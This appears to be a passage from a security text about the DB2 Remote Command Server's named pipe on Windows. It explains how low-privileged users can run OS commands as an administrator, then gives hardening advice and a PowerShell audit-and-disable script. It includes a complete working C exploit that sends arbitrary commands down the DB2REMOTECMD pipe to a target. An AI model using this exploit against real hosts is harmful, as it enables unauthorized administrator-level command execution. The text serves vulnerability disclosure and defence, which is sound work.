The DB2 Remote Command Server exists to ease administration of the DB2 server by allowing users to run arbitrary commands on the remote host. Although it was intended to let administrators run commands, any user can run commands through it, provided of course they have a valid user ID and password. Letting everyone and their dog run commands remotely is bad enough; what exacerbates the problem is that each command runs with the privileges of the account under which the Remote Command Server itself runs. On Windows, for example, that account is db2admin, which is a member of the Administrators group. What this means is that a low-privileged guest account can run OS commands with administrator-level privileges.
/* DB2 Remote Command Server Exploit

   DB2RCMD.EXE listens on a named pipe DB2REMOTECMD and executes commands sent
   through it. When a connection is made to the pipe a new process is created,
   namely db2rcmdc.exe, and this executes the command.
*/

#include <stdio.h>
#include <string.h>
#include <windows.h>

int main(int argc, char *argv[])
{
    char buffer[540] = "";
    char NamedPipe[260] = "\\\\";   /* builds \\target\pipe\DB2REMOTECMD */
    HANDLE rcmd = NULL;
    char *ptr = NULL;
    int len = 0;
    DWORD Bytes = 0;

    if (argc != 3)
    {
        printf("\n\tDB2 Remote Command Exploit.\n\n");
        printf("\tUsage: db2rmtcmd target \"command\"\n");
        printf("\n\tDavid Litchfield\n\t(david@ngssoftware.com)\n\t6th September 2003\n");
        return 0;
    }

    strncat(NamedPipe, argv[1], 200);
    strcat(NamedPipe, "\\pipe\\DB2REMOTECMD");

    // Setup handshake message: 0x01 at offset 0, "DB2" at offset 4,
    // length of the command (one byte) at offset 532
    ZeroMemory(buffer, 540);
    buffer[0] = 0x01;
    ptr = &buffer[4];
    strcpy(ptr, "DB2");
    len = strlen(argv[2]);
    buffer[532] = (char)len;

    // Open the named pipe
    rcmd = CreateFileA(NamedPipe, GENERIC_WRITE | GENERIC_READ, 0, NULL,
                       OPEN_EXISTING, 0, NULL);
    if (rcmd == INVALID_HANDLE_VALUE)
        return printf("Failed to open pipe %s. Error %d.\n", NamedPipe, GetLastError());

    // Send handshake
    len = WriteFile(rcmd, buffer, 536, &Bytes, NULL);
    if (!len)
        return printf("Failed to write to %s. Error %d.\n", NamedPipe, GetLastError());

    ZeroMemory(buffer, 540);
    strncpy(buffer, argv[2], 254);

    // Send command
    len = WriteFile(rcmd, buffer, strlen(buffer), &Bytes, NULL);
    if (!len)
        return printf("Failed to write to %s. Error %d.\n", NamedPipe, GetLastError());

    // Read results until the server closes the pipe
    while (len)
    {
        len = ReadFile(rcmd, buffer, 530, &Bytes, NULL);
        printf("%s", buffer);
        ZeroMemory(buffer, 540);
    }
    return 0;
}
Allowing users to run commands remotely is dangerous, especially when those commands run with administrator privileges. As such this feature should not be used. Turning off the Remote Command Server, and disabling it so that it does not start again at the next reboot, will help secure the DB2 installation.
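One way to check whether a Windows DB2 host is exposed in this way and to switch the service off, as an added example that is not from the original text and not IBM's own tooling, is the PowerShell audit script below. It assumes the Windows service name contains DB2REMOTECMD and that its image is db2rcmd.exe (the text names DB2RCMD.EXE); both are assumptions to confirm with Get-Service on your own build. The pipe name \\.\pipe\DB2REMOTECMD is the one the text gives. Run it from an elevated prompt; without the -Disable switch it only reports.

```powershell
# Added example (not from the original text): audit, and optionally disable,
# the DB2 Remote Command Server on a Windows DB2 host.
# Assumptions: service name matches *DB2REMOTECMD* or its image is db2rcmd.exe;
# the pipe is \\.\pipe\DB2REMOTECMD as stated in the text.
param([switch]$Disable)

# 1. Is the named pipe present? A client can only reach the server if it is.
$pipes = [System.IO.Directory]::GetFiles('\\.\pipe\') |
         Where-Object { $_ -like '*DB2REMOTECMD*' }
if ($pipes) { Write-Host "Remote Command Server pipe present: $($pipes -join ', ')" }
else        { Write-Host "No DB2REMOTECMD pipe found" }

# 2. Which service backs it, and which account does it run under?
#    Commands sent down the pipe run with this account's privileges, so
#    StartName is the field that matters (db2admin or LocalSystem are the bad cases).
$svcs = Get-CimInstance Win32_Service |
        Where-Object { $_.Name -like '*DB2REMOTECMD*' -or $_.PathName -like '*db2rcmd.exe*' }

foreach ($s in $svcs) {
    $acct    = $s.StartName
    $isAdmin = $false
    if ($acct -in 'LocalSystem', 'NT AUTHORITY\SYSTEM') {
        $isAdmin = $true
    } else {
        # Local Administrators membership check; ignored if the account is not local
        try {
            $user    = $acct.Split('\')[-1]
            $isAdmin = [bool](Get-LocalGroupMember -Group 'Administrators' -ErrorAction Stop |
                              Where-Object { $_.Name -like "*\$user" })
        } catch { }
    }
    "{0,-32} state={1,-8} start={2,-9} account={3} admin={4}" -f `
        $s.Name, $s.State, $s.StartMode, $acct, $isAdmin
}

# 3. Stop AND disable: stopping alone leaves it to come back at the next reboot.
if ($Disable) {
    foreach ($s in $svcs) {
        Stop-Service -Name $s.Name -Force -ErrorAction SilentlyContinue
        Set-Service  -Name $s.Name -StartupType Disabled
        Write-Host "Disabled $($s.Name)"
    }
}
```

Re-run the script after disabling and confirm that the pipe no longer appears in step 1; if the service is later re-enabled by an installer or fix pack, the pipe reappears and the audit will show it.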